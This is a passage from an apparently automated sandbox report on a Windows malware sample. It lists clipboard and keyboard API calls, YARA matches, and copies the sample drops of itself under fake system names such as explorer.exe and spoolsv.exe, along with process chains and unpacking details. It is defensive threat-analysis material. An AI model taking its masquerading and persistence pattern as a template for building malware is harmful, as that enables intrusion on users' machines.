00000002.00000003.2249423158.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2476922152.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2225864160.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2457246476.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428A7E OpenClipboard,0_2_00428A7E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428B36 SetClipboardData,0_2_00428B36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428B36 SetClipboardData,0_2_00428B36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428B36 SetClipboardData,0_2_00428B36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428B36 SetClipboardData,0_2_00428B36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00428B36 SetClipboardData,3_2_00428B36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00428B36 SetClipboardData,3_2_00428B36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00428B36 SetClipboardData,3_2_00428B36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00428B36 SetClipboardData,3_2_00428B36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428806 GetClipboardData,0_2_00428806
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428876 GetKeyboardState,0_2_00428876
                      Source: Yara matchFile source: 2.3.explorer.exe.2e784a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.spoolsv.exe.2cb84a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.spoolsv.exe.2f084a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.421000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.2f984a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.spoolsv.exe.421000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.spoolsv.exe.421000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.spoolsv.exe.2e10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.explorer.exe.421000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.svchost.exe.421000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.spoolsv.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.explorer.exe.2d80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.3140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.svchost.exe.2f40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.explorer.exe.2d984a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.32384a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.svchost.exe.30384a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.2ea0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.explorer.exe.2ca0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.2132597386.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2113766529.0000000003140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.2282489300.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.2354977756.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2059845376.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2383521769.0000000000539000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2095587943.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.2084070518.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2174500522.0000000000539000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2310054237.0000000000539000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 3596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 320, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 6204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 4592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6208, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4708, type: MEMORYSTR

                      System Summary

                      barindex
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004286D6 NtdllDefWindowProc_A,0_2_004286D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004286D6 NtdllDefWindowProc_A,0_2_004286D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004286D6 NtdllDefWindowProc_A,0_2_004286D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004286D6 NtdllDefWindowProc_A,0_2_004286D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004286D6 NtdllDefWindowProc_A,3_2_004286D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004286D6 NtdllDefWindowProc_A,3_2_004286D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004286D6 NtdllDefWindowProc_A,3_2_004286D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004286D6 NtdllDefWindowProc_A,3_2_004286D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427EEE: DeviceIoControl,0_2_00427EEE
                      Source: C:\Users\user\Desktop\file.exeFile created: c:\windows\resources\themes\explorer.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: c:\windows\resources\themes\explorer.exeJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: c:\windows\resources\spoolsv.exeJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: c:\windows\resources\spoolsv.exeJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeFile created: c:\windows\resources\svchost.exeJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeFile created: c:\windows\resources\svchost.exeJump to behavior
                      Source: C:\Windows\Resources\svchost.exeFile created: C:\Windows\Resources\Themes\tjcm.cmnJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412C100_2_00412C10
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00412C103_2_00412C10
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 004254D0 appears 36 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 004254AC appears 122 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00427B54 appears 51 times
                      Source: C:\Windows\Resources\spoolsv.exeCode function: String function: 004254D0 appears 36 times
                      Source: C:\Windows\Resources\spoolsv.exeCode function: String function: 004254AC appears 121 times
                      Source: C:\Windows\Resources\spoolsv.exeCode function: String function: 00427B54 appears 51 times
                      Source: file.exe, 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs file.exe
                      Source: file.exeBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs file.exe
                      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: file.exe, file.exe, 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, spoolsv.exe, spoolsv.exe, 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000005.00000002.2170519310.0000000000401000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000A.00000002.2309973257.0000000000401000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 0000000D.00000002.2381560124.0000000000401000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: A*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                      Source: file.exe, spoolsv.exeBinary or memory string: *\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                      Source: file.exe, 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmp, spoolsv.exe, 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000005.00000002.2170519310.000000000041B000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000A.00000002.2309973257.000000000041B000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 0000000D.00000002.2381560124.000000000041B000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: mlH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp mP
                      Source: classification engineClassification label: mal100.spre.evad.winEXE@17/10@3/2
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AFBA GetDiskFreeSpaceA,0_2_0042AFBA
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410180 CreateToolhelp32Snapshot,Process32First,K32GetModuleFileNameExA,Process32Next,0_2_00410180
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042820E LoadResource,0_2_0042820E
                      Source: C:\Windows\Resources\svchost.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\~DF7BE104EE9DF6D51F.TMPJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                      Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: file.exeReversingLabs: Detection: 73%
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exe
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SE
                      Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exe
                      Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PR
                      Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                      Source: unknownProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\consent.exe consent.exe 5152 322 0000013E5E228840
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exeJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SEJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exeJump to behavior
                      Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PRJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" ROJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\consent.exe consent.exe 5152 322 0000013E5E228840Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" ROJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: wmsgapi.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: msctfmonitor.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: msutb.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\Resources\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:W;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW;
                      Source: C:\Windows\Resources\spoolsv.exeUnpacked PE file: 3.2.spoolsv.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:W;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW;
                      Source: C:\Windows\Resources\spoolsv.exeUnpacked PE file: 5.2.spoolsv.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:W;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW;
                      Source: C:\Windows\Resources\Themes\explorer.exeUnpacked PE file: 10.2.explorer.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:W;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW;
                      Source: C:\Windows\Resources\svchost.exeUnpacked PE file: 13.2.svchost.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:W;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW;
